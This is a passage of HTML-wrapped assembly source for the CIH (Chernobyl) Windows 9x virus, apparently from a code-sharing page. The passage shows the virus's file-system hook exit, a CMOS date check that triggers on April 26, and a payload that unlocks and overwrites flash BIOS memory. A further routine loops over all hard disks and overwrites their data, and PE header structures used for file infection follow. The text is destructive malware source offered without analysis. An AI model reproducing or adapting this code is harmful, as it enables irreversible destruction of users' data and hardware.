📄 3.htm
字号:
call [ebx+20h+04h] ; Call pIFSFunc <br>
pop ecx ; </p>
<p>mov [ebx+1ch], eax ; Modify EAX Value in Stack </p>
<p>; *************************** <br>
; * After Calling pIFSFunc, * <br>
; * Get Some Data from the * <br>
; * Returned pioreq. * <br>
; *************************** </p>
<p>cmp dword ptr [ebx+20h+04h+04h], 00000024h <br>
jne QuitMyVirusFileSystemHook </p>
<p>; ***************** <br>
; * Get the File * <br>
; * Modification * <br>
; * Date and Time * <br>
; * in DOS Format.* <br>
; ***************** </p>
<p>mov eax, [ecx+28h] <br>
mov (FileModificationTime-@6)[esi], eax </p>
<p>; *************************** <br>
; * Quit My Virus' * <br>
; * IFSMgr_FileSystemHook * <br>
; *************************** </p>
<p>QuitMyVirusFileSystemHook: </p>
<p>popad </p>
<p>ret </p>
<p>; ************************************* <br>
; * Kill Computer !? ... *^_^* * <br>
; ************************************* </p>
<p>IsKillComputer: <br>
; Get Now Month from BIOS CMOS <br>
mov ax, 0708h <br>
out 70h, al <br>
in al, 71h </p>
<p>xchg ah, al </p>
<p>; Get Now Day from BIOS CMOS <br>
out 70h, al <br>
in al, 71h </p>
<p>xor ax, 0426h ; 04/26/???? <br>
jne DisableOnBusy </p>
<p>; ************************************** <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; * Kill Kill Kill Kill Kill Kill Kill * <br>
; ************************************** </p>
<p>; *************************** <br>
; * Kill BIOS EEPROM * <br>
; *************************** </p>
<p>mov bp, 0cf8h <br>
lea esi, IOForEEPROM-@7[esi] </p>
<p>; *********************** <br>
; * Show BIOS Page in * <br>
; * 000E0000 - 000EFFFF * <br>
; * ( 64 KB ) * <br>
; *********************** </p>
<p>mov edi, 8000384ch <br>
mov dx, 0cfeh <br>
cli <br>
call esi </p>
<p>; *********************** <br>
; * Show BIOS Page in * <br>
; * 000F0000 - 000FFFFF * <br>
; * ( 64 KB ) * <br>
; *********************** </p>
<p>mov di, 0058h <br>
dec edx ; and al,0fh <br>
mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h <br>
call esi </p>
<p>; *********************** <br>
; * Show the BIOS Extra * <br>
; * ROM Data in Memory * <br>
; * 000E0000 - 000E01FF * <br>
; * ( 512 Bytes ) * <br>
; * , and the Section * <br>
; * of Extra BIOS can * <br>
; * be Writted... * <br>
; *********************** </p>
<p>lea ebx, EnableEEPROMToWrite-@10[esi] </p>
<p>mov eax, 0e5555h <br>
mov ecx, 0e2aaah <br>
call ebx <br>
mov byte ptr [eax], 60h </p>
<p>push ecx <br>
loop $ </p>
<p>; *********************** <br>
; * Kill the BIOS Extra * <br>
; * ROM Data in Memory * <br>
; * 000E0000 - 000E007F * <br>
; * ( 80h Bytes ) * <br>
; *********************** </p>
<p>xor ah, ah <br>
mov [eax], al </p>
<p>xchg ecx, eax <br>
loop $ </p>
<p>; *********************** <br>
; * Show and Enable the * <br>
; * BIOS Main ROM Data * <br>
; * 000E0000 - 000FFFFF * <br>
; * ( 128 KB ) * <br>
; * can be Writted... * <br>
; *********************** </p>
<p>mov eax, 0f5555h <br>
pop ecx <br>
mov ch, 0aah <br>
call ebx <br>
mov byte ptr [eax], 20h </p>
<p>loop $ </p>
<p>; *********************** <br>
; * Kill the BIOS Main * <br>
; * ROM Data in Memory * <br>
; * 000FE000 - 000FE07F * <br>
; * ( 80h Bytes ) * <br>
; *********************** </p>
<p>mov ah, 0e0h <br>
mov [eax], al </p>
<p>; *********************** <br>
; * Hide BIOS Page in * <br>
; * 000F0000 - 000FFFFF * <br>
; * ( 64 KB ) * <br>
; *********************** <br>
; or al,10h <br>
mov word ptr (BooleanCalculateCode-@10)[esi], 100ch <br>
call esi </p>
<p>; *************************** <br>
; * Kill All HardDisk * <br>
; *************************************************** <br>
; * IOR Structure of IOS_SendCommand Needs * <br>
; *************************************************** <br>
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * <br>
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * <br>
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * <br>
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * <br>
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? * <br>
; *************************************************** </p>
<p>KillHardDisk: <br>
xor ebx, ebx <br>
mov bh, FirstKillHardDiskNumber <br>
push ebx <br>
sub esp, 2ch <br>
push 0c0001000h <br>
mov bh, 08h <br>
push ebx <br>
push ecx <br>
push ecx <br>
push ecx <br>
push 40000501h <br>
inc ecx <br>
push ecx <br>
push ecx </p>
<p>mov esi, esp <br>
sub esp, 0ach </p>
<p>LoopOfKillHardDisk: <br>
int 20h <br>
dd 00100004h ; VXDCall IOS_SendCommand </p>
<p>cmp word ptr [esi+06h], 0017h <br>
je KillNextDataSection </p>
<p>ChangeNextHardDisk: <br>
inc byte ptr [esi+4dh] </p>
<p>jmp LoopOfKillHardDisk </p>
<p>KillNextDataSection: <br>
add dword ptr [esi+10h], ebx <br>
mov byte ptr [esi+4dh], FirstKillHardDiskNumber </p>
<p>jmp LoopOfKillHardDisk </p>
<p>; *************************** <br>
; * Enable EEPROM to Write * <br>
; *************************** </p>
<p>EnableEEPROMToWrite: <br>
mov [eax], cl <br>
mov [ecx], al <br>
mov byte ptr [eax], 80h <br>
mov [eax], cl <br>
mov [ecx], al </p>
<p>ret </p>
<p>; *************************** <br>
; * IO for EEPROM * <br>
; *************************** </p>
<p>IOForEEPROM: <br>
@10 = IOForEEPROM </p>
<p>xchg eax, edi <br>
xchg edx, ebp <br>
out dx, eax </p>
<p>xchg eax, edi <br>
xchg edx, ebp <br>
in al, dx </p>
<p>BooleanCalculateCode = $ <br>
or al, 44h </p>
<p>xchg eax, edi <br>
xchg edx, ebp <br>
out dx, eax </p>
<p>xchg eax, edi <br>
xchg edx, ebp <br>
out dx, al </p>
<p>ret </p>
<p>; ********************************************************* <br>
; * Static Data * <br>
; ********************************************************* </p>
<p>LastVxDCallAddress = IFSMgr_Ring0_FileIO <br>
VxDCallAddressTable db 00h <br>
db IFSMgr_RemoveFileSystemApiHook-_PageAllocate <br>
db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook <br>
db IFSMgr_Ring0_FileIO-UniToBCSPath </p>
<p>VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h <br>
VxDCallTableSize = ($-VxDCallIDTable)/04h </p>
<p>; ********************************************************* <br>
; * Virus Version Copyright * <br>
; ********************************************************* </p>
<p>VirusVersionCopyright db 'CIH v' <br>
db MajorVirusVersion+'0' <br>
db '.' <br>
db MinorVirusVersion+'0' <br>
db ' TTIT' </p>
<p>; ********************************************************* <br>
; * Virus Size * <br>
; ********************************************************* </p>
<p>VirusSize = $ <br>
; + SizeOfVirusCodeSectionTableEndMark(04h) <br>
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) <br>
; + SizeOfTheFirstVirusCodeSectionTable(04h) </p>
<p>; ********************************************************* <br>
; * Dynamic Data * <br>
; ********************************************************* </p>
<p>VirusGameDataStartAddress = VirusSize <br>
@6 = VirusGameDataStartAddress <br>
OnBusy db 0 <br>
FileModificationTime dd ? </p>
<p>FileNameBuffer db FileNameBufferSize dup(?) <br>
@7 = FileNameBuffer </p>
<p>DataBuffer = $ <br>
@8 = DataBuffer <br>
NumberOfSections dw ? <br>
TimeDateStamp dd ? <br>
SymbolsPointer dd ? <br>
NumberOfSymbols dd ? <br>
SizeOfOptionalHeader dw ? <br>
_Characteristics dw ? <br>
Magic dw ? <br>
LinkerVersion dw ? <br>
SizeOfCode dd ? <br>
SizeOfInitializedData dd ? <br>
SizeOfUninitializedData dd ? <br>
AddressOfEntryPoint dd ? <br>
BaseOfCode dd ? <br>
BaseOfData dd ? <br>
ImageBase dd ? <br>
@9 = $ <br>
SectionAlignment dd ? <br>
FileAlignment dd ? <br>
OperatingSystemVersion dd ? <br>
ImageVersion dd ? <br>
SubsystemVersion dd ? <br>
Reserved dd ? <br>
SizeOfImage dd ? <br>
SizeOfHeaders dd ? <br>
SizeOfImageHeaderToRead = $-NumberOfSections </p>
<p>NewAddressOfEntryPoint = DataBuffer ; DWORD <br>
SizeOfImageHeaderToWrite = 04h </p>
<p>StartOfSectionTable = @9 <br>
SectionName = StartOfSectionTable ; QWORD <br>
VirtualSize = StartOfSectionTable+08h ; DWORD <br>
VirtualAddress = StartOfSectionTable+0ch ; DWORD <br>
SizeOfRawData = StartOfSectionTable+10h ; DWORD <br>
PointerToRawData = StartOfSectionTable+14h ; DWORD <br>
PointerToRelocations = StartOfSectionTable+18h ; DWORD <br>
PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD <br>
NumberOfRelocations = StartOfSectionTable+20h ; WORD <br>
NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD <br>
Characteristics = StartOfSectionTable+24h ; DWORD <br>
SizeOfScetionTable = Characteristics+04h-SectionName </p>
<p>; ********************************************************* <br>
; * Virus Total Need Memory * <br>
; ********************************************************* </p>
<p>VirusNeedBaseMemory = $ </p>
<p>VirusTotalNeedMemory = @9 <br>
; + NumberOfSections(??)*SizeOfScetionTable(28h) <br>
; + SizeOfVirusCodeSectionTableEndMark(04h) <br>
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) <br>
; + SizeOfTheFirstVirusCodeSectionTable(04h) </p>
<p>; ********************************************************* <br>
; ********************************************************* <br>
</p>
<CODE><FONT color=#000000><FONT
color=#cc0000><BR>
</FONT></FONT></CODE></TD>
</TR>
</TBODY>
</TABLE>
<TABLE cellSpacing=0 width=545 align=center border=0>
<TBODY>
<TR>
<TD></TD>
</TR>
</TBODY>
</TABLE>
<P align=center> </P></BODY></HTML>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -